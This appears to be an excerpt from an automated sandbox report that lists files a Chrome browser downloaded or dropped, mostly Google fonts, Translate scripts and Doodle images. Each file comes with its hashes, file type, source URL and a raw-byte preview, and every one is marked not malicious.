                                                                                                                                                                                                                                                            SSDEEP:384:HDKhlQ8AGL0dgUoEGBQTc7r6QYMkyr/iobA2E4/jKcJZI7lhzi:jslQ+LhUoTB0Qr6Qjkg/DmcJufzi
                                                                                                                                                                                                                                                            MD5:285467176F7FE6BB6A9C6873B3DAD2CC
                                                                                                                                                                                                                                                            SHA1:EA04E4FF5142DDD69307C183DEF721A160E0A64E
                                                                                                                                                                                                                                                            SHA-256:5A8C1E7681318CAA29E9F44E8A6E271F6A4067A2703E9916DFD4FE9099241DB7
                                                                                                                                                                                                                                                            SHA-512:5F9BB763406EA8CE978EC675BD51A0263E9547021EA71188DBD62F0212EB00C1421B750D3B94550B50425BEBFF5F881C41299F6A33BBFA12FB1FF18C12BC7FF1
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......<...........<Z.........................d..z..J.`..L.\..<.....<.....^...x.6.$..6. .... ..S..}%.......|....x..[j.E...d..-A...]=sjf$X.o.5......V....i?}.\...;...V......5..mO=,[.B..d'..=..M...q...8..U'..N..G...[..8....Jp..xP...'.?....}.-.1F.C.....%z..#...Q...~.~..3.............r.Xk..v.*.7t.+bw...f..b...q.W..'E.....O..a..HI.....Y.B..i.K.0.:.d.E.Lw....Q..~.6.}B...bT.F.,<./....Qu....|...H....Fk.*-..H..p4.$......{.2.....".T'..........Va.6+.9uv....RW..U$8...p...........H5...B..N..V...{.1....5}p.q6..T...U.P.N...U...!.w..?..mI..8q.}.... >.Z.K.....tq..}.><Ok..w.. ..v....W...{....o...."+#+,..vdt...p.WKK:.p1...3`. 3.......Q.].V.$}.......:.S..bb!I...c.of.2uq.n.MaJ..Cf.......w.$.9C...sj.=...=.Z7...h.w M.D..A.t.....]..GVpL...U(.+.)m..e)..H.}i.o.L...S.r..m..Ko....i..M..J..84.=............S..@......Z.V.E..b...0.....@h>...."$.?....../..?.....?.J.a,..|..d...|`.m5..b..LWc...L...?.G.].i...Q..1.:..LJV.J...bU.2.:\.kt.......t.....k....B..i.z+...........A.....
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 13676, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):13676
                                                                                                                                                                                                                                                            Entropy (8bit):7.986468673625358
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:Wa+eqpZtDXwm9BsIbswUO1dbP/5uxugWgk:WwqJ0mrLs9Gu0gWL
                                                                                                                                                                                                                                                            MD5:4D4F9793319B2D94573820BA75773F27
                                                                                                                                                                                                                                                            SHA1:CED5AF48D828C8530AF2FBB52C760720DF8CECA6
                                                                                                                                                                                                                                                            SHA-256:8878D98CCB41EC139E1D88104ED132D3050C7231042659E67212728988413979
                                                                                                                                                                                                                                                            SHA-512:038B5AAD54AE9EFE6D7EB2DB9101A87F59B1D768BA1CDAF97B2A13300672C2E6CEF313A4D1743EC6B701FE4939BD5C86EF8BF857B57B080996CE4A8BFFD4E7FB
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesans/v45/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPjwUvaYr.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......5l......~...4..............................6..0?HVAR.z.`?STAT..'..../<...........0.:.6.$.. . ..>. ....r5l.V..UU..3.Q.l....i.(....... G......i........`.&X}U5.Wou..fk..Mb!....].C6*......9.#_r.B...}.?._=q.&.P..<.]..].{.>.?.-.}.'.f...tGh.\..~......G...v......;..h.w.`.....F.k...F....bY...f..*$b......j.A.....`0.K1.C...n.w..A.........g+j]..Y...-.m.=./z.{..w..9.u;..d....ae.A....%.=.;.(...t..I...*....c._onu............J.H..%.*9....X.....V.[.WY...l.r...>.d....:l................T.<...$.T7........,!...]...W.=......8A...........k'..G..H.kE80....q.zs..>..RJ..e..(.q.!qAj..\.Z.........-.~.F....d\.{YJ.G*e.-......Y....s..n..%.....U...,..#..!..........163>....$.R......l....?.;..>.....;...%..YY..H.FH.W_.....X0.T^..?....>......$Xk.T..L].....N'f.O.......Ab.Ho..`. .)P...B.4 ..H..d..Q.!..d.....9q..yC..!...TAP...-.J...J.2...9P.BH......R..k..u@]..^..,s...CK-.VZ.....b...~..q'.qM u`.a=..C..x.Jx..^,........~......... ._.d.;w..B...H...jq!.?...R/A....XP.\*....3..S,-.....5.TT
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):34187
                                                                                                                                                                                                                                                            Entropy (8bit):7.955960097215149
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:KORIEujzTUZVsZprJ3ykPikYAFu370MyLpou7gEB9cr+1m:KBEu3TMXkakYAMr0MyLeuUwi
                                                                                                                                                                                                                                                            MD5:D5BDE41AE06EEB8A3AE652E01F2394D5
                                                                                                                                                                                                                                                            SHA1:255A07591653637B6369F7439CA22380A4597346
                                                                                                                                                                                                                                                            SHA-256:4F033FE4FF41FBB6A725891F0145B4F6273B96F2EA553A1636E30BC83462A37C
                                                                                                                                                                                                                                                            SHA-512:D5C276C90DEC46871C6002FBBFF6FEA7E9778E9CC71FACA7CD72FED7E78570D44C99238A92042F04E29042415A90E3734306E0BBAA1382E56AC7AADAA30EAECE
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................K......................!..1.A."Qa.q.2.......#B.R...3br.....CSs..$c....D...................................5......................!.1.AQ.."a..2q..B...#Rbr...3$............?....@.(.e.l......6P.-....6P....@.(.e.l......6P...|1@&...@.(.e.l......6P....@.(.e.l......R..M....6P....@.(..(....e.l......V......6P....@.(.e.l......6P....@.(.e.l..h............@......@6.(..(..(..(..X...(............M.....hP..I...M.......$.d.N'.h..@...(.3....@.....1$v.P....6.V........q..*.v.j.Y...(..X......4.h...J...@8-....................................@6.".}.D....JM.-t[..e,..,l.c.<......|...4.I.q..>re.G.W.d...2..~j.(..x..+..d...Y^.?. ~.j.BE].bMI......V...T'B.5(...I.J.X.R..(..(..(..(.*P...h....h."...."8..........Yh..................h..(.4.M...@..@......MCiv[.}..:.?h...b./.m.]N.iy ...*.S...lj-.....B.,.C
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1609)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):319615
                                                                                                                                                                                                                                                            Entropy (8bit):5.670015116657881
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:TDE36RYGNhdyXxS/z0ZBUPeF/3i8N4cRSuYHiaPk0fqe3F/g2cirRoGKu:RYQOXmz0ZBge93i/vkX2F/6irqg
                                                                                                                                                                                                                                                            MD5:E8B018C4C977058E8BD4B64038B3FD95
                                                                                                                                                                                                                                                            SHA1:155BC33A09F8C24C9DBE6AC289C301AE80B0C1A9
                                                                                                                                                                                                                                                            SHA-256:35F7C7D04D9873EA4A29A32286B972A7B37E0D95A095F0AAA5B45A11BD8196E7
                                                                                                                                                                                                                                                            SHA-512:1C375608AA743A62E901FD4F03089AA26838E612A7055FEF1B38C607CA45CAA857280DA75F460D89B4177E7E3F12081701991B5F1899A2CB7914B761BA71E562
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BVgquf,CHCSlb,COQbmf,E2VjNc,EEDORb,EFQ78c,FZTbYc,G0j0Je,GSlykd,GiFjve,I6YDgd,IZT63,Id96Vc,Izs65d,JE2clc,JNoxi,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,MDB2J,MI6k7c,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PJgxJf,PrPYRd,QIhFr,Qnj3Pe,QqJ8Gd,RAnnUd,RMhBfe,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,TzmfU,U0aPgd,UUJqVe,UWMmZb,Uas9Hd,Ulmmrd,UthHZe,V3dDOb,V8JnLd,VETAO,VwDzFe,WO9ee,XBRlNc,XVMNvd,YrN4Fb,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,bD99Db,bYHiff,byfTOb,duFQFc,ehH0Pd,fKUV3e,fmklff,g8fAWe,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,i5dxUd,j4UNFc,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,rPRh8e,s2VbJb,s39S4,soHxf,tjiVBd,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=GILUZe,UECOXe,rCcCxc,a4GDlb,eYJrS,sJhETb,JH2zc,IjTJJb,fR6Vdb,bTi8wc,Tpj7Pb,u8fSBf,eM1C7d,rSlV0d,t1sulf,VNcg1e,DFTXbf,Xn16n,EF8pe,nKuFpb,xzbRj,JWUKXe,MJWMce,ZbunN,WYNSOe,R6UQsc,hmxKAd,P6Sgne,MY2OBe,Gkrb3e,MaBk4,HwavCb,ff8rzd,qRXAtf,CTfTTd,gJzDyc,xdp6Ne,s2XCRc,onWwzb,CW8lw,UfGXTd,LP4cEc,Un38xf,dmy0Zb,ZH8ved,QKK0O,NufREb,LFynkb,XMsnSd,fKBXPe,tQX3bd,tQbu0,JPvYpc,sGhhBd,ceo3ne,HruX3d,WCciof,jMem0b,TJQ3Ud,JVNQkc,cPVRG,JNcm2e,M2suMc"
                                                                                                                                                                                                                                                            Preview:"use strict";_F_installCss(".fp93dc{color:rgb(60,64,67);font-family:\"Google Sans\",sans-serif;font-size:16px;font-weight:500;line-height:24px;text-align:center}.PWcpvc{color:rgb(128,134,139);font-size:14px;letter-spacing:.2px;line-height:20px;margin-top:12px;margin-bottom:38px}@media screen and (min-width:720px){.fp93dc{font-size:22px;font-weight:400;text-align:start}.PWcpvc{font-size:16px;line-height:24px;margin-top:16px}}sentinel{}");.this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("GILUZe");.var QV=function(a){_.N.call(this,a.va);this.i=a.Xd.Vf};_.C(QV,_.N);QV.qa=function(){return{Xd:{Vf:function(){return new _.fi(function(a,b){_.OV().then(a,b)})}}}};QV.prototype.j=function(){1!=this.i.getStyle()&&this.i.close()};QV.prototype.click=function(a){_.Yu(a.event.target,"A")&&this.j();return!0};_.O(QV.prototype,"cOuCgd",function(){return this.click});_.O(QV.prototype,"Vtdxob",function(){return this.j});_.Sw(_.gwa,QV);._.p();._
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:PNG image data, 660 x 313, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):128292
                                                                                                                                                                                                                                                            Entropy (8bit):7.995460303593401
                                                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                                                            SSDEEP:3072:Qo3RMy7/ouXGXOHgEk9rBrJ25nEGFiKaMHs+Il+bBfqUMBb:Q4MyUkO9PBrJ2xEGHaMM+Q+I9
                                                                                                                                                                                                                                                            MD5:9D6EED1786306EEA7670561A1FB64B34
                                                                                                                                                                                                                                                            SHA1:1A3E2D0EEC65A1F5202BF3694F6F33114FB31622
                                                                                                                                                                                                                                                            SHA-256:4223F78E126426DF74C9CD9725F4DB4B8B71616C3BD6F0A838F379BFF400A506
                                                                                                                                                                                                                                                            SHA-512:2B2D496F137FB1CB36A7A4703228BBCBF7B9076063A164A67755FB6923D1B8242ABDF2E9B66E8521E2E37AE4082DFEDE7AC35564935A2CF5BC2149EF665B1A14
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:.PNG........IHDR.......9.......'.....sBIT.....O... .IDATx..y.dYU&..s".9U.7.B..(@.AA.@...v@.l.OQ...<@#..L.>...'....i..k..FPD...*.Q.nV.P..y.........Z...EIi....s.^{.k...".9.a.s....p...9.a.s....?.'.9.a.s....`0O.s....0.9..`...0.9.a.s...<y.a.s....p..y....0.9......=.9.a.s......{.s....0.;.....0.9.a.w0.'.9.a.s....`0O.s....0.9..`...0.9.a.s...<y.a.s....p..y....0.9......=.9.a.s.........a.s...../...-2..7...../.. ...}.;8t .0..y....0.9.a?0...lm.x[..r.)...Kr..\.(.[.....y.........@...c ..P....yk5....\...a.)|...0.9.a.s.!.ln....y..b.xk...r....r.|z]>t-.|....(...U`..K@...b3"...B.D..y.>...Y^=0X\\.....%yo..].o..,...w.D....{.W...t...a...pv.s....0.9...F.......zIN...o.s....?..s.../o~s..k..........UHw.J........l..@F......|.#.9..T....7.Z<y|_..Y.w<}z../.e.>.q.!..._..y..NW.;.U..U..{5...0Z...X]....jGPs....0.9$.`.H....h&2...d2...x.'.[..y9}..o.O..o.....(N...G.......]..D @....t...a.%...60.L".P."......*TA.f......s<K..;...3....~.........;......W_.*TG.....X=..........c..t"....... R.9.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 512x288, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):25172
                                                                                                                                                                                                                                                            Entropy (8bit):7.953763413211907
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:02wPaGnXfEonJsKtHzhBPeeASUVOe8vQ5Xpe8FAvYo8MnnqIXpgox8nfFO7:0nPas3FFhBPjtUIe83mAvdnqmp/8nNO7
                                                                                                                                                                                                                                                            MD5:396BAFBEECB5F8985825A2DAAF5440A8
                                                                                                                                                                                                                                                            SHA1:7CA6C13C87591290043921971EF7C083AD5B09ED
                                                                                                                                                                                                                                                            SHA-256:C84F7DA26ED3A479B9750F1778C995BC052C01A03FCCD14DEEF62C8E1EC3DA94
                                                                                                                                                                                                                                                            SHA-512:6F34BBE7F7747C079827BD7B990670B46AC0FA267FD179A624F01D31B0AB6880FC75F0A789AD7FFC027A14DD4765E5708E6EF21BACACB11E6CF1FC129F720FB0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://lh3.googleusercontent.com/stOglKI-L-Qw2zjHiiBtJk-yD5dWHmciNUALJQaoDW3z2hYAuVAIPlkd_vOOf5CmAxq4YKb6K1J-Hpek77sA9Riju8yhwu1TFn3SwcIPJxiQdStnYgg
                                                                                                                                                                                                                                                            Preview:......JFIF...................................................................................................................................................... ..............................................F..........................!..1A"Qaq...#2R...Bb...$3rs...D....C.Sct...................................4........................!1..A."Q.aq....2...B.R..#b............?...*./.PG.6H...H.....X....l.SDZ..V......)H.JL...@..(&.....0......L...... ...(...&....[.AM>...N..Bc. ..Q[.!...........$......S..a4!.BKPDQH..(.^.91XI..u.../S....G`(..t$.Y"b.*...HA6..tV$.`..D-*@......L.b..._D.5.6...0....P...RhV..A.*ea....B.&....@......R..0..........@.....1...V..3.8..![.R7...n.E3uR9.|.ESu..[N&... .Y.d.&1.-{...!.?/..t.Yf.....3...v!L.|.Y.36&.WL..C]..s.....d.......d.V.=v_...Q.......]..<&j.#...j.G3.$..x..(H...F=.......}V..n.?s..4^.\..r=.......x..L.)1 ..LQQ.....r.!...$..).rKxo..^I"....5..Yfd.B.j.2H..pk.......9..v..w.}.j.y..+cvq.5x|.......r7o.2..VX.......v.4..Z.o.......j.7-.g.B... T$5+'A..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, baseline, precision 8, 1300x400, components 3
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):175505
                                                                                                                                                                                                                                                            Entropy (8bit):7.9567962670682055
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:GxHGa1fXc6EPUXWhrNMqswFrIr1xJkhpIzXZyS0c4SCV65jwb5BQT:GxHGMfc6EPYWhrNLswF0SITZyS0fwdxT
                                                                                                                                                                                                                                                            MD5:9B0F270CF582C7BBF1292B15DBFB7055
                                                                                                                                                                                                                                                            SHA1:636580A66563E594232E260247F704194182A129
                                                                                                                                                                                                                                                            SHA-256:4F4761FF1AE0A329D16C1D11DCA7FC6B762672412D4757B1473E7D38EAF742D1
                                                                                                                                                                                                                                                            SHA-512:286FDFB34E39754FF3F95B41146410E2F5FE412698E05D8BD23C5749323684746D8C4520C4CABE8E1F961084392F8F42723224011AE9670FE410DBE00EC05795
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................+............!.1..AQa"..q.......2#...$3.BC%..9Rb.4WxY.r.S..&......:..T.5Uu.Fv.7w..(8Xh.I.......................!..1.A..Qaq"...2..BR#....br3.....S$.C......cs.4T%.t.U......5&68.............?........`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0......`...0..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):60408
                                                                                                                                                                                                                                                            Entropy (8bit):4.746090328799968
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:768:fctDxhgZqb0HZb0HEuZ5V2KKCICtvlc54WA+Vw4G4Fw0RToTQTQDbx4r/MT4gohL:fesZvo2KKVmp29bFhTOG2T4go+9nK8Hm
                                                                                                                                                                                                                                                            MD5:A371D1ADD8D95D9A5AC0222DBFC707DA
                                                                                                                                                                                                                                                            SHA1:B273236FC088B58AEC5BE2E7CD642E290C31CBF3
                                                                                                                                                                                                                                                            SHA-256:0A11003900B5593A71CFAB463C2A5E7D2588B251F697EAE8B64946F4D178FE54
                                                                                                                                                                                                                                                            SHA-512:1C4FC0A64E927A073713435830F9D3044894FFDAF30E6966B28D1F3757D564D6E9124F632EB0B61EA41947973FCB28C82F98696E021A8A827FB96E2FF0D27ACD
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg width="1280" height="307" viewBox="0 0 1280 307" fill="none" xmlns="http://www.w3.org/2000/svg">.<circle cx="1121.01" cy="217.239" r="27.6618" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.58 204.281V292.049" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.58 223.588L1130.88 213.286" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.39 233.491L1113.06 226.163" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1120.39 217.429L1113.06 210.102" stroke="#D4E1F3" stroke-linecap="round"/>.<circle cx="1132.29" cy="223.588" r="1.69704" stroke="#D4E1F3" stroke-linecap="round"/>.<circle cx="1104.71" cy="210.101" r="1.69704" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1101.26 297.3C1104.15 291.738 1110.46 288.868 1116.55 290.35C1122.63 291.832 1126.92 297.283 1126.93 303.549" stroke="#D4E1F3" stroke-linecap="round"/>.<path d="M1087.8 303.549C1087.7 300.666 1089.18 297.957 1091.66 296.486C1094.14 295.014 1097.23 295.014 1099.71 296.486C1102.19 297.957 1103
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):78277
                                                                                                                                                                                                                                                            Entropy (8bit):7.956888332273651
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:1536:BiNLq94LHApgTXFwLm7uAUmZKrgOn24boNK9tPQ5ON7PmcSX:Qg9ggpTLoUmJOqGtcO5Pl8
                                                                                                                                                                                                                                                            MD5:3074613CD645A493556E0537685BC681
                                                                                                                                                                                                                                                            SHA1:2166F2F3E325C74D1BB9D9481BC34DA0F9B7524C
                                                                                                                                                                                                                                                            SHA-256:54F4E58815DEA9D32D6060D1E3A7F3D12966FBE5F816F8DE7F444F85383A024B
                                                                                                                                                                                                                                                            SHA-512:AAB82B703B6EF106D2704158DA53D22ED6BBDB3013B23F6978D37630F13625F9FBF5E4151B7E0D37E22C6743E8C1420EBD32BC1F8B3F1F548207C8389E801BFA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2019/nowruz-2019-6284808622702592-2x.jpg
                                                                                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 2017/05/06-01:08:21 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:c9434a28-dbee-4a40-9335-948cf49a3268" xmpMM:DocumentID="xmp.did:27116169385611E9AD04A38A63232406" xmpMM:InstanceID="xmp.iid:27116168385611E9AD04A38A63232406" xmp:CreatorTool="Adobe Photoshop CC 2018 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:3614d4f7-3152-44b3-9651-d525f5349542" stRef:documentID="adobe:docid:photoshop:5d35e9f1-165f-3a47-a030-4eedce31ea31"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d.............................
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 8700, version 1.0
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):8700
                                                                                                                                                                                                                                                            Entropy (8bit):7.969818213587576
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:192:yCw8YHa1G/nGeTkiYHassSJb5+ArIk4gc7a/uM3Jz:dR1G/fTkkshJYHknMajz
                                                                                                                                                                                                                                                            MD5:2FE42D3535DA679F04F3D17C6365A3B3
                                                                                                                                                                                                                                                            SHA1:64DA6FE900FDBB59AB97F956ECDE4E57F9848403
                                                                                                                                                                                                                                                            SHA-256:1B36C0B0A947C1A484C4384FDE4735E3FBE8F0EAAA04B058B74C83425B08D4B0
                                                                                                                                                                                                                                                            SHA-512:4F85931EE163001B089685C1CCA7B35976194EA836AF1C9EB9154FD7DB1717FC2000BBB4A112C02683B19F41A159941A797C31814E085B3D2AD51B66705B9E80
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/googlesanstext/v21/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTnmZjtiu7.woff2
                                                                                                                                                                                                                                                            Preview:wOF2......!.......U...!..........................."..T....`..&....(.......6.$..l. .....)...HJ%.....P ~>.J.uR."d...1..f.cG.8..+-.c....nuG...(....X.v...mO ;..Dg,t..l..u....+..+{>d...'w..ovR..._q....Z.....^.......a).........)uQD.S......'.......o.....!...C.....C.V.....f..Ba.%..(..L=.te....ab..D..)...mx..Kf1......T..F.1.....H..._f..6..z5.....B..BY..P.......o._...%)I6>e.z.....GR5p.c.qb{.X..........>.6.ogt...&E.uV...n.Tx..iF..Ko.....LZ..(...f......k^....Q.D-..m.TE...|..W;78?.*<.Tt<...bq.$/...a.[..%[v.2....Z..[.a.wQ.....K.........1..#"A.1..... 0... ....R......%. .A.rBpQ............./.!T.B.X...B#M..i..F"B....uC./B......0....t.LY.9..F..0.D..f .2.a....,EXn%.j...Z...V..v!.q....'.E8.. .8..E.....Q4..{R'h?......r...@.\k.WV..%xXE...PfM/....3........ZWh.0...l.pxH..j...5%g.......&.8...&...U...A.%T..#....r...K.]0.`..b..b...Y.#..(..(..VG.\.A..U1."...&XP.;.g.m..m..\....]....F.&.t2.".\...B3.....2.2]f.Y.f9E.`%...Mlf.[........5...4..$..r.#.....e.."b.+Y-$.k.kg.f..?....L.C..
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1000 x 422
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):472692
                                                                                                                                                                                                                                                            Entropy (8bit):7.937234407621061
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12288:+j3laK4TMWSNzVztevENA88AO5AJbeI/bw2Men:+rlZ4TCN6QeAOmJbt7
                                                                                                                                                                                                                                                            MD5:8364BE2EB65552EBEFCE77A1A9ED926F
                                                                                                                                                                                                                                                            SHA1:B7C4AC47DB7B824CA7ED05ED23F346A967E811A4
                                                                                                                                                                                                                                                            SHA-256:9F80AE587FE535115679A05F44783A74FF7608767209A4B3B5BF51063B709E66
                                                                                                                                                                                                                                                            SHA-512:A14BA632D6D79EC6411A849420FF4A6EEB9437B667450D7A9C8270692338F72354D4F16BEDECB88DFA04E83B00CAD123F4F901912527484712B674FC5680EFD9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2017/first-day-of-fall-2017-southern-hemisphere-5673416651702272-hp2x.gif
